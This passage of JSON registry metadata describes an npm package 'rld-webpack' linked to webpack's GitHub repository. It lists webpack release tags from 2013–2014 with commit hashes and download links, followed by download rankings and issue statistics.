k/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-25T23:51:27.269Z","dependent_packages_count":0,"downloads":7,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":40.03317130195296,"dependent_repos_count":25.32799796580169,"dependent_packages_count":32.89382871786066,"stargazers_count":0.08412454391301193,"forks_count":0.5276340879249939,"average":19.773351323490665},"purl":"pkg:npm/rld-webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/rld-webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/rld-webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/rld-webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-25T19:00:07.885Z","issues_count":10163,"pull_requests_count":9423,"avg_time_to_close_issue":10850741.648681419,"avg_time_to_close_pull_request":2749833.8614084506,"issues_closed_count":9897,"pull_requests_closed_count":8875,"pull_request_authors_count":1444,"issue_authors_count":6684,"avg_comments_per_issue":5.834399291547771,"avg_comments_per_pull_request":3.1735116205030245,"merged_pull_requests_count":6013,"bot_issues_count":8,"bot_pull_requests_count":2910,"past_year_issues_count":81,"past_year_pull_requests_count":926,"past_year_avg_time_to_close_issue":883737.0535714285,"past_year_avg_time_to_close_pull_request":364617.14285714284,"past_year_issues_closed_count":56,"past_year_pull_requests_closed_count":728,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":63,"past_year_avg_comments_per_issue":3.3950617283950617,"past_year_avg_comments_per_pull_request":4.818574514038877,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":575,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1070,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/G